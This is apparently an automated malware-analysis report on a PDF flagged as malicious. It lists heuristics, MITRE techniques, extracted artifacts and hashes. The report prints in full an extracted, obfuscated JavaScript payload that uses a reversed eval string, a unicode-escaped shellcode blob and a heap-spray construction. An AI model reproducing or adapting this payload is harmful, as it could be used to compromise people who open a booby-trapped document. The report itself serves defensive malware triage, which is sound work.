MALICIOUS
68
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.002 Spearphishing Attachment
The PDF contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. An embedded JavaScript file, 'javascript_obj0012_000.js', was extracted. The presence of these elements suggests the document is designed to execute malicious code, likely for downloading a secondary payload. The embedded URL 'http://www.bitstream.com' is also noted.
Machine Learning
- Nyx PDF Classifier malicious score 0.9996
Heuristics 4
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.bitstream.com In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 3686 bytes |
SHA-256: d3541f8e2467ff8bbaf9e5a0fe8f7c314e4018f3c389a54a2c5f12f6ef690c6a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var eva=new Function("a","ev al (a);".split(" ").join(""));
var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) ipmet (epak = olygak rav ;epacsenu = epak rav } } ]j[lp =+ ipmet esle ;"%" =+ ipmet )"Q" == ]j[lp( fi { )"P" =! ]j[lp( fi { )++j;htgnel.lp<j;0=j( rof ;"" = ipmet rav ;"b014uQc6e7uQ2ffauQ4c4duQb180uQ6543uQ8754uQ65d1uQ676duQ5c86uQa9a9uQ87eauQeef9uQa7eauQbdfduQ24d2uQceb9uQe1a8uQ4768uQ673cuQ5deauQ9798uQef9cuQef47uQ5760uQ5954uQa642uQ5953uQfc95uQ247buQd833uQ61d8uQ5c19uQ9a82uQ5953uQ6c71uQc8f4uQc167uQ8020uQ6415uQ7c38uQdceauQba77uQac97uQ3e35uQd7deuQ06f5uQ8ab6uQ38e5uQad8cuQe14fuQcfd3uQ5c58uQ14a3uQda67uQe9f4uQ960buQ31d0uQ65f7uQb2e5uQ59c4uQ9ff0uQddd4uQc44buQ0e20uQ897auQ033fuQ398fuQ67bcuQa336uQ47b9uQd49cuQ1fb5uQdeeauQd1ccuQd2f8uQ8688uQe7e1uQfb3cuQd8a4uQ67d9uQ87b0uQ6425uQb2bauQab80uQ7e9auQ2724uQ6d70uQ30b6uQd58auQb844uQ5c4cuQ5ccauQ52f2uQd88fuQ47f9uQ6db6uQ54d8uQf5e8uQ4baeuQc9e6uQa536uQ30c6uQ3c40uQ7138uQ13b7uQ1896uQ7194uQb5fbuQ1b33uQ424fuQ9d47uQ929cuQbddduQ0070uQf211uQ0070uQ137duQ0070uQd451uQff09uQffffuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQff09uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQffffuQ8e6euQ0070uQbb51uQ0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPbPeP5P0PuPQP5P7PePePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP1P8PbPfPuPQP2PcP4P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P0P3P8PuPQP3P8P0PcPuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP9P8P8P1PuPQPbP8PaP1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP5P1P8P5PuPQPaP5PbPePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P5P0P9PuPQPaP5P0P9PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP1P3P7PdPuPQP0P0P0P0PuPQP0P4P0P0PuPQP0P0P0P0PuPQP0P0P0P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P0P0PuPQP0P0P0P0PuPQP1P0P0P0PuPQP0P0P1P0PuPQPfPfPfPfPuPQPfPfPfPfPuPQP0P0P7P0PuPQP4P5PcP5PuPQP0P0P7P0PuPQP2PeP2P5PuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP0P0P1P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2PbPfP7PuPQPePfPfP7PuPQP0P0P3P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPdP4P5P1PuPQP0P0P0P0PuPQP0P0P0P1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP1P0P0P0PuPQP4P2P1P0PuPQP0P0P7P0PuPQP9P9P5P1PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP3P3P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQPfP6P5P1PuPQP0P0P7P0PuPQPfPeP8P4PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQP9P1P9P4PuPQPcP0PcP0PuPQPcP0PcP0PuPQP" = lp rav ';
eva(s.split("").reverse().join(""));
|
|||
font_00_sfnt_off00000319.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes |
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.